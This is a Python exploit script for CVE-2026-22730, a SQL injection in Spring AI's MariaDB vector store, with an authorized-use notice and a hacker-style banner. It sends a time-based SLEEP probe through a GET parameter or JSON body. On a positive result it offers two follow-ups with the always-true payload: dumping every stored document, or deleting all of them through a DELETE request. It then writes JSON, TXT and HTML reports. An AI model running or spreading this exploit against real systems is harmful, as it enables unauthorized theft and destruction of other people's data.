#!/usr/bin/env python3
# CVE-2026-22730 scanner: time-based SQL injection check against a Spring AI
# MariaDB vector store endpoint, with optional follow-up requests and
# JSON/TXT/HTML reporting.
#
# NOTE: run this only against systems you own or are explicitly authorized
# to test.

import argparse
import html
import json
import sys
import time
from datetime import datetime
from urllib.parse import urlencode, quote_plus

import requests

print("""
███╗░░██╗██╗░░░██╗██╗░░░░░██╗░░░░░██████╗░░█████╗░░█████╗░ ░█████╗░██╗░░██╗
████╗░██║██║░░░██║██║░░░░░██║░░░░░╚════██╗██╔══██╗██╔══██╗ ██╔══██╗██║░██╔╝
██╔██╗██║██║░░░██║██║░░░░░██║░░░░░░░███╔═╝██║░░██║██║░░██║ ██║░░██║█████═╝░
██║╚████║██║░░░██║██║░░░░░██║░░░░░██╔══╝░░██║░░██║██║░░██║ ██║░░██║██╔═██╗░
██║░╚███║╚██████╔╝███████╗███████╗███████╗╚█████╔╝╚█████╔╝ ╚█████╔╝██║░╚██╗
╚═╝░░╚══╝░╚═════╝░╚══════╝╚══════╝╚══════╝░╚════╝░░╚════╝░ ░╚════╝░╚═╝░░╚═╝
CVE-2026-22730 Scanner & Exploit
SQL Injection in Spring AI's MariaDB Vector Store
Supports GET (query parameter) and POST (JSON body) with placeholder.
NULL200OK 💀🔥created by NABEEL 🔥💀
""")

# ---------------------------
# Configuration
# ---------------------------
DEFAULT_SLEEP = 5  # seconds for time-based detection
TIMEOUT = 10  # HTTP request timeout
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Marker for payload replacement in POST JSON
PAYLOAD_MARKER = "__PAYLOAD__"


# ---------------------------
# Helper Functions
# ---------------------------
def send_request(base_url, method, param_name, value, json_template=None):
    """
    Send one HTTP request carrying ``value`` and time it.

    Supported methods (case-insensitive):

    * GET    - ``value`` is sent as query parameter ``param_name``.
    * POST   - ``json_template`` is required; every PAYLOAD_MARKER in it is
               replaced by ``value`` and the result is sent as the JSON body.
    * DELETE - JSON body when ``json_template`` is given, otherwise the same
               query-parameter form as GET.

    ``value`` is substituted into the template text verbatim before parsing,
    so it must be valid inside the JSON string where the marker sits.

    Returns ``(response, elapsed_seconds)``, or ``(None, 0)`` when the method
    is unsupported, the template is missing/invalid, or the request raises a
    ``requests`` exception (a message is printed in each case).
    """
    headers = {"User-Agent": USER_AGENT}
    method = method.upper()

    if method not in ("GET", "POST", "DELETE"):
        print(f"[!] Unsupported method: {method}")
        return None, 0

    # POST always carries a JSON body; DELETE does so only if a template exists.
    use_json_body = method == "POST" or (method == "DELETE" and bool(json_template))

    url = base_url
    body = None
    if use_json_body:
        if not json_template:
            print("[!] POST method requires --json-template with placeholder.")
            return None, 0
        try:
            body = json.loads(json_template.replace(PAYLOAD_MARKER, value))
        except json.JSONDecodeError:
            print("[!] Invalid JSON template.")
            return None, 0
        headers["Content-Type"] = "application/json"
    else:
        url = base_url + "?" + urlencode({param_name: value}, quote_via=quote_plus)

    try:
        # perf_counter is monotonic, so the measurement is not disturbed by
        # wall-clock adjustments while the request is in flight.
        start = time.perf_counter()
        resp = requests.request(method, url, json=body, headers=headers, timeout=TIMEOUT)
        elapsed = time.perf_counter() - start
    except requests.exceptions.RequestException as exc:
        print(f"[!] Request failed: {exc}")
        return None, 0
    return resp, elapsed


def detect_vulnerability(url, method, param, sleep_time, baseline_value="nonexistent", json_template=None):
    """
    Time‑based detection: compare a normal request against a SLEEP payload.

    Sends ``baseline_value`` first, then the SLEEP payload, and reports the
    target as vulnerable when the payload request took at least
    ``sleep_time - 1`` seconds longer than the baseline.

    Note that for ``sleep_time <= 1`` this threshold is zero or negative, so
    callers should pass a larger value to get a meaningful result.

    Returns True if the target appears vulnerable, False otherwise (including
    when either request could not be sent).
    """
    print("[*] Sending baseline request...")
    resp1, time1 = send_request(url, method, param, baseline_value, json_template)
    if resp1 is None:
        print("[!] Baseline request failed. Exiting.")
        return False

    # SQLi payload that tries to inject a SLEEP
    payload = f"' OR SLEEP({sleep_time}) --"
    print(f"[*] Sending time‑based payload: {payload}")
    resp2, time2 = send_request(url, method, param, payload, json_template)
    if resp2 is None:
        print("[!] Payload request failed. Exiting.")
        return False

    print(f"[*] Baseline time: {time1:.2f}s, Payload time: {time2:.2f}s")

    # If payload took at least sleep_time seconds longer, consider vulnerable
    if time2 - time1 >= sleep_time - 1:  # allow 1s network jitter
        print("[+] Target appears VULNERABLE to SQL injection!")
        return True

    print("[-] Target does NOT seem vulnerable.")
    return False


def exploit_retrieve_all(url, method, param, json_template=None):
    """
    Send the always-true payload with the given method and return the body.

    Returns the response text, or "" when no response was obtained. A
    ``requests.Response`` is falsy for 4xx/5xx status codes, so error
    responses also yield "".
    """
    payload = "' OR '1'='1"
    print(f"[*] Exploiting with payload (retrieve all): {payload}")
    resp, _ = send_request(url, method, param, payload, json_template)
    return resp.text if resp else ""


def exploit_delete_all(url, method, param, json_template=None):
    """
    Send the always-true payload using the DELETE method and return the body.

    ``method`` is accepted for signature parity with the other helpers but is
    not used: the request is always sent as DELETE.

    Returns the response text, or "" when no response was obtained or the
    response has a 4xx/5xx status (``requests.Response`` is falsy then).
    """
    payload = "' OR '1'='1"
    print(f"[*] Exploiting with payload (DELETE all): {payload}")
    # Use DELETE method
    resp, _ = send_request(url, "DELETE", param, payload, json_template)
    return resp.text if resp else ""


def save_results(data, target_url, method, vuln_status, exploit_data=None, exploit_type=None):
    """
    Save results in HTML, JSON, and TXT files in the current directory.

    Files are named ``cve-2026-22730_<YYYYmmdd_HHMMSS>.{json,txt,html}``.

    ``data`` is not used; it is kept so existing callers keep working.
    ``exploit_data`` is text returned by the remote server, so it is
    HTML-escaped before being placed in the HTML report, and all files are
    written as UTF-8 so non-ASCII response text cannot fail on platforms
    with a narrower default encoding.
    """
    timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
    base_filename = f"cve-2026-22730_{timestamp}"

    # Prepare data structure
    report = {
        "timestamp": timestamp,
        "target": target_url,
        "method": method,
        "vulnerable": vuln_status,
        "detection_method": "time-based SQL injection",
        "exploit_type": exploit_type,
        "exploit_result": exploit_data if exploit_data else None,
    }

    # JSON
    with open(f"{base_filename}.json", "w", encoding="utf-8") as f:
        json.dump(report, f, indent=4)
    print(f"[+] JSON report saved: {base_filename}.json")

    # TXT
    with open(f"{base_filename}.txt", "w", encoding="utf-8") as f:
        f.write("CVE-2026-22730 Scan Report\n")
        f.write(f"Timestamp: {timestamp}\n")
        f.write(f"Target: {target_url}\n")
        f.write(f"Method: {method}\n")
        f.write(f"Vulnerable: {vuln_status}\n")
        if exploit_type:
            f.write(f"Exploit performed: {exploit_type}\n")
        if exploit_data:
            f.write("\n--- Exploitation Result ---\n")
            f.write(exploit_data)
    print(f"[+] TXT report saved: {base_filename}.txt")

    # HTML: every interpolated value is escaped so the report renders as
    # text even if the target URL or server response contains markup.
    safe_target = html.escape(str(target_url))
    safe_method = html.escape(str(method))
    safe_status = html.escape(str(vuln_status))
    safe_type = html.escape(str(exploit_type)) if exploit_type else "None"
    safe_data = html.escape(str(exploit_data)) if exploit_data else "No exploitation performed."
    html_content = f"""<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>CVE-2026-22730 Scan Report</title>
</head>
<body>
<h1>CVE-2026-22730 Scan Report</h1>
<p><strong>Timestamp:</strong> {timestamp}</p>
<p><strong>Target URL:</strong> {safe_target}</p>
<p><strong>HTTP Method:</strong> {safe_method}</p>
<p><strong>Vulnerable:</strong> {safe_status}</p>
<p><strong>Type:</strong> {safe_type}</p>
<pre>{safe_data}</pre>
</body>
</html>
"""
    with open(f"{base_filename}.html", "w", encoding="utf-8") as f:
        f.write(html_content)
    print(f"[+] HTML report saved: {base_filename}.html")
# ---------------------------
# Main
# ---------------------------
def main():
    """
    Command-line entry point.

    Reads options from the command line; when ``--url`` is absent, prompts
    for every setting interactively instead. Both paths apply the same
    checks (URL present, ``--param`` for GET, a JSON template containing the
    payload marker for POST) and exit with status 1 when one fails.

    After validation the detection step runs, the user may choose a
    follow-up action if the target appears vulnerable, and the reports are
    written via ``save_results``.
    """
    parser = argparse.ArgumentParser(description="CVE-2026-22730 Scanner")
    parser.add_argument("--url", help="Base URL (e.g., http://localhost:8081/api/docs)")
    parser.add_argument("--method", default="GET", choices=["GET", "POST"], help="HTTP method (default: GET)")
    parser.add_argument("--param", help="Query parameter name (for GET) or marker name (for POST, optional)")
    parser.add_argument("--json-template", help="JSON template with __PAYLOAD__ placeholder (required for POST)")
    parser.add_argument("--baseline", default="nonexistent", help="Baseline value for normal request (default: nonexistent)")
    parser.add_argument("--sleep", type=int, default=DEFAULT_SLEEP, help=f"Sleep seconds for time-based detection (default: {DEFAULT_SLEEP})")
    args = parser.parse_args()

    # Interactive mode if arguments missing
    if not args.url:
        print("=== CVE-2026-22730 Scanner ===\n")
        args.url = input("Enter target URL: ").strip()
        if not args.url:
            print("[!] Target URL is required. Exiting.")
            sys.exit(1)

        args.method = input("HTTP method (GET/POST) [GET]: ").strip().upper() or "GET"
        if args.method not in ["GET", "POST"]:
            print("[!] Invalid method. Using GET.")
            args.method = "GET"

        if args.method == "GET":
            args.param = input("Enter query parameter name (e.g., department): ").strip()
            # Mirror the command-line check: an empty name would send "?=value".
            if not args.param:
                print("[!] GET method requires a query parameter name. Exiting.")
                sys.exit(1)
        else:  # POST
            args.param = input("Enter a name for the injected field (optional, for reference): ").strip() or "payload"
            args.json_template = input("Enter JSON template with __PAYLOAD__ placeholder: ").strip()
            if PAYLOAD_MARKER not in args.json_template:
                print(f"[!] JSON template must contain '{PAYLOAD_MARKER}'. Exiting.")
                sys.exit(1)

        baseline_input = input("Enter a benign value for baseline (default: nonexistent): ").strip()
        if baseline_input:
            args.baseline = baseline_input

        sleep_input = input(f"Enter sleep time for detection (default {DEFAULT_SLEEP}): ").strip()
        if sleep_input:
            try:
                args.sleep = int(sleep_input)
            except ValueError:
                print("[!] Invalid number. Using default.")
    else:
        # Validate arguments
        if args.method == "POST" and not args.json_template:
            print("[!] POST method requires --json-template with __PAYLOAD__ placeholder.")
            sys.exit(1)
        if args.method == "POST" and PAYLOAD_MARKER not in args.json_template:
            print(f"[!] JSON template must contain '{PAYLOAD_MARKER}'.")
            sys.exit(1)
        if args.method == "GET" and not args.param:
            print("[!] GET method requires --param.")
            sys.exit(1)

    # Detection compares the timing difference against (sleep - 1) seconds,
    # so a sleep of 1 or less gives a non-positive threshold (false
    # positives), and a sleep at or above the request timeout makes the
    # payload request time out instead of completing (false negatives).
    min_sleep = 2
    if not min_sleep <= args.sleep < TIMEOUT:
        print(f"[!] Sleep time must be at least {min_sleep} and below the {TIMEOUT}s request timeout.")
        sys.exit(1)

    # Remove trailing slash if present
    args.url = args.url.rstrip("/")

    print(f"\n[*] Targeting: {args.url} with method {args.method}")

    # Step 1: Detection
    vuln = detect_vulnerability(args.url, args.method, args.param, args.sleep, args.baseline, args.json_template)

    exploit_data = None
    exploit_type = None

    # Step 2: Optional follow-up, only offered when detection was positive
    if vuln:
        print("\n[?] Target is vulnerable. Choose exploitation option:")
        print(" 1. Retrieve all documents (SELECT injection)")
        print(" 2. Delete all documents (DELETE injection) - DESTRUCTIVE")
        print(" 3. Skip exploitation")
        choice = input("Enter 1, 2, or 3: ").strip()

        if choice == '1':
            exploit_type = "RETRIEVE_ALL"
            exploit_data = exploit_retrieve_all(args.url, args.method, args.param, args.json_template)
            if exploit_data:
                print("[+] Data retrieval completed.")
            else:
                print("[!] Exploit failed or returned no data.")
        elif choice == '2':
            # Destructive action: require an explicit typed confirmation.
            print("\n[!] WARNING: This will DELETE ALL documents from the vector store!")
            confirm = input("Type 'yes' to confirm: ").strip().lower()
            if confirm == 'yes':
                exploit_type = "DELETE_ALL"
                exploit_data = exploit_delete_all(args.url, args.method, args.param, args.json_template)
                if exploit_data:
                    print("[+] Delete request sent. Check response.")
                else:
                    print("[!] Delete exploit failed.")
            else:
                print("[*] Deletion cancelled.")
        else:
            print("[*] Skipping exploitation.")

    # Step 3: Save results
    save_results(exploit_data, args.url, args.method, vuln, exploit_data, exploit_type)
# Run the scanner only when executed as a script, not when imported.
if __name__ == "__main__":
    main()